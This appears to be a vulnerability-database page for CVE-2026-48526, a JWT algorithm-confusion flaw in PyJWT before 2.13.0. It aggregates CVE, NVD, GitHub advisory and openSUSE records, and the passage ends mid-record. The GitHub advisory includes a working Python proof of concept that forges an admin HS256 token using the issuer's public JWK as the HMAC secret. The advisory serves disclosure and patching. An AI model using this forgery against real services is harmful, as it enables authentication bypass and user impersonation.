Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-48526 (GCVE-0-2026-48526)
Vulnerability from cvelistv5 – Published: 2026-05-28 15:09 – Updated: 2026-05-29 15:15| URL | Tags |
|---|---|
| https://github.com/jpadilla/pyjwt/security/adviso… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-48526",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T03:55:56.833915Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T15:15:55.958Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pyjwt",
"vendor": "jpadilla",
"versions": [
{
"status": "affected",
"version": "\u003c 2.13.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-347",
"description": "CWE-347: Improper Verification of Cryptographic Signature",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-28T15:09:09.258Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"source": {
"advisory": "GHSA-xgmm-8j9v-c9wx",
"discovery": "UNKNOWN"
},
"title": "PyJWT: Public-key JWK accepted as HMAC secret enables forged HS256 tokens when mixed families are allowed"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-48526",
"datePublished": "2026-05-28T15:09:09.258Z",
"dateReserved": "2026-05-21T16:18:10.619Z",
"dateUpdated": "2026-05-29T15:15:55.958Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-48526",
"date": "2026-06-16",
"epss": "0.00148",
"percentile": "0.04348"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-48526\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-28T16:16:29.657\",\"lastModified\":\"2026-06-01T17:45:32.253\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"},{\"lang\":\"en\",\"value\":\"CWE-347\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.13.0\",\"matchCriteriaId\":\"2692B308-E3F9-4586-AD28-F64C14358242\"}]}]}],\"references\":[{\"url\":\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-48526\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-29T03:55:56.833915Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-29T15:15:53.152Z\"}}], \"cna\": {\"title\": \"PyJWT: Public-key JWK accepted as HMAC secret enables forged HS256 tokens when mixed families are allowed\", \"source\": {\"advisory\": \"GHSA-xgmm-8j9v-c9wx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"jpadilla\", \"product\": \"pyjwt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.13.0\"}]}], \"references\": [{\"url\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\", \"name\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-347\", \"description\": \"CWE-347: Improper Verification of Cryptographic Signature\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-28T15:09:09.258Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-48526\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-29T15:15:55.958Z\", \"dateReserved\": \"2026-05-21T16:18:10.619Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-28T15:09:09.258Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-48526
Vulnerability from fkie_nvd - Published: 2026-05-28 16:16 - Updated: 2026-06-01 17:45| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx | Exploit, Vendor Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| pyjwt_project | pyjwt | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2692B308-E3F9-4586-AD28-F64C14358242",
"versionEndExcluding": "2.13.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0."
}
],
"id": "CVE-2026-48526",
"lastModified": "2026-06-01T17:45:32.253",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-28T16:16:29.657",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
},
{
"lang": "en",
"value": "CWE-347"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-XGMM-8J9V-C9WX
Vulnerability from github – Published: 2026-06-15 19:28 – Updated: 2026-06-15 19:28[!NOTE] Exploitation requires a verifier configured with both symmetric and asymmetric algorithms in
algorithms=[…]and a raw-JSON JWK as thekey=argument, both contrary to documented usage, hence the High attack-complexity rating.
Summary
When the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm.
Details
In JWT algorithm confusion attack, the verifier is mistakenly use of public key to be used as the shared secret in symmetric algorithms. In pyjwt case, when the verifier is supporting both HMAC with other asymmetric algorithm and mistakenly using the public key of the issuer to verify the token as demonstrated in the following example:
jws.decode(token, key=rsa_jwk_json, algorithms=["HS256","RS256"]))
An attacker who specifies in the token header to use HMAC, will cause the verifier to accept the JWK as the secret key in HMAC algorithm. The attacker will be able to forge JWT signed with the public key of the issuer to impersonate any user.
If we look on current protections implemented in the library, at class HMACAlgorithm:
def prepare_key(self, key: str | bytes) -> bytes:
key_bytes = force_bytes(key)
if is_pem_format(key_bytes) or is_ssh_key(key_bytes):
raise InvalidKeyError(
"The specified key is an asymmetric key or x509 certificate and"
" should not be used as an HMAC secret."
)
return key_bytes
We can observe that there is a protection against this type of attacks but only when the verifier is using PEM format or SSH key to verify the token. JSON Web Keys, on the other hand will pass the validation.
In The following example:
jws.decode(token, key=rsa_jwk_json, algorithms=["HS256","RS256"]))
There is indeed a wrong implementation of the verifier, but a stronger protection in the library side will prevent and protect against those type of misconfiugrations.
The bypass happens only if the verifier: (a) allows HS* and an asymmetric algorithm in the same call and (b) passes a public-key value as key.
PoC
Please run the code and observe the payload printed in clear text({"sub":"alice","admin":true}')
from jwt.api_jws import PyJWS
import json, base64, hmac, hashlib
def b64u(b): return base64.urlsafe_b64encode(b).rstrip(b"=")
# Public RSA JWK (public by design)
rsa_jwk_json = json.dumps({"kty":"RSA","n":"AQAB","e":"AQAB"})
# Attacker-crafted token: flip to HS256 and choose claims
header = b64u(b'{"alg":"HS256","typ":"JWT"}')
payload = b64u(b'{"sub":"alice","admin":true}')
signing = header + b"." + payload
# Sign with HMAC using the PUBLIC JWK JSON TEXT as the “secret”
sig = hmac.new(rsa_jwk_json.encode(), signing, hashlib.sha256).digest()
token = (signing + b"." + b64u(sig)).decode()
# Vulnerable verifier: mixed families + JWK JSON string as key
jws = PyJWS()
print(jws.decode(token, key=rsa_jwk_json, algorithms=["HS256","RS256"]))
# -> b'{"sub":"alice","admin":true}'
Impact
Unauthenticated token forgery → full identity/role impersonation at the resource server (authorization bypass).
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyjwt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48526"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T19:28:06Z",
"nvd_published_at": "2026-05-28T16:16:29Z",
"severity": "HIGH"
},
"details": "\u003e [!NOTE]\n\u003e Exploitation requires a verifier configured with both symmetric and asymmetric algorithms in `algorithms=[\u2026]` and a raw-JSON JWK as the `key=` argument, both contrary to documented usage, hence the High attack-complexity rating.\n\n### Summary\nWhen the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. \n\n### Details\nIn JWT algorithm confusion attack, the verifier is mistakenly use of public key to be used as the shared secret in symmetric algorithms.\nIn pyjwt case, when the verifier is supporting both HMAC with other asymmetric algorithm and mistakenly using the public key of the issuer to verify the token as demonstrated in the following example:\n \n`jws.decode(token, key=rsa_jwk_json, algorithms=[\"HS256\",\"RS256\"])) `\n\nAn attacker who specifies in the token header to use HMAC, will cause the verifier to accept the JWK as the secret key in HMAC algorithm. \nThe attacker will be able to forge JWT signed with the public key of the issuer to impersonate any user. \n\nIf we look on current protections implemented in the library, at class HMACAlgorithm:\n\n```\n def prepare_key(self, key: str | bytes) -\u003e bytes:\n key_bytes = force_bytes(key)\n\n if is_pem_format(key_bytes) or is_ssh_key(key_bytes):\n raise InvalidKeyError(\n \"The specified key is an asymmetric key or x509 certificate and\"\n \" should not be used as an HMAC secret.\"\n )\n\n return key_bytes\n```\nWe can observe that there is a protection against this type of attacks but only when the verifier is using PEM format or SSH key to verify the token. JSON Web Keys, on the other hand will pass the validation.\n\nIn The following example:\n`jws.decode(token, key=rsa_jwk_json, algorithms=[\"HS256\",\"RS256\"])) `\nThere is indeed a wrong implementation of the verifier, but a stronger protection in the library side will prevent and protect against those type of misconfiugrations. \n\nThe bypass happens only if the verifier:\n (a) allows HS* and an asymmetric algorithm in the same call and (b) passes a public-key value as key.\n\n### PoC\nPlease run the code and observe the payload printed in clear text({\"sub\":\"alice\",\"admin\":true}\u0027)\n\n```\nfrom jwt.api_jws import PyJWS\nimport json, base64, hmac, hashlib\n\ndef b64u(b): return base64.urlsafe_b64encode(b).rstrip(b\"=\")\n\n# Public RSA JWK (public by design)\nrsa_jwk_json = json.dumps({\"kty\":\"RSA\",\"n\":\"AQAB\",\"e\":\"AQAB\"})\n\n# Attacker-crafted token: flip to HS256 and choose claims\nheader = b64u(b\u0027{\"alg\":\"HS256\",\"typ\":\"JWT\"}\u0027)\npayload = b64u(b\u0027{\"sub\":\"alice\",\"admin\":true}\u0027)\nsigning = header + b\".\" + payload\n\n# Sign with HMAC using the PUBLIC JWK JSON TEXT as the \u201csecret\u201d\nsig = hmac.new(rsa_jwk_json.encode(), signing, hashlib.sha256).digest()\ntoken = (signing + b\".\" + b64u(sig)).decode()\n\n# Vulnerable verifier: mixed families + JWK JSON string as key\njws = PyJWS()\nprint(jws.decode(token, key=rsa_jwk_json, algorithms=[\"HS256\",\"RS256\"]))\n# -\u003e b\u0027{\"sub\":\"alice\",\"admin\":true}\u0027\n```\n\n\n### Impact\nUnauthenticated token forgery \u2192 full identity/role impersonation at the resource server (authorization bypass).",
"id": "GHSA-xgmm-8j9v-c9wx",
"modified": "2026-06-15T19:28:06Z",
"published": "2026-06-15T19:28:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"type": "PACKAGE",
"url": "https://github.com/jpadilla/pyjwt"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-179.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "PyJWT: Public-key JWK accepted as HMAC secret enables forged HS256 tokens when mixed families are allowed"
}
OPENSUSE-SU-2026:11024-1
Vulnerability from csaf_opensuse - Published: 2026-06-13 00:00 - Updated: 2026-06-13 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-PyJWT-2.13.0-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-PyJWT-2.13.0-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11024",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11024-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48522 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48522/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48523 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48523/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48524 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48524/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48525 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48525/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48526 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48526/"
}
],
"title": "python311-PyJWT-2.13.0-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-13T00:00:00Z",
"generator": {
"date": "2026-06-13T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11024-1",
"initial_release_date": "2026-06-13T00:00:00Z",
"revision_history": [
{
"date": "2026-06-13T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python311-PyJWT-2.13.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python313-PyJWT-2.13.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python314-PyJWT-2.13.0-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python311-PyJWT-2.13.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python313-PyJWT-2.13.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python314-PyJWT-2.13.0-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.s390x",
"product_id": "python311-PyJWT-2.13.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.s390x",
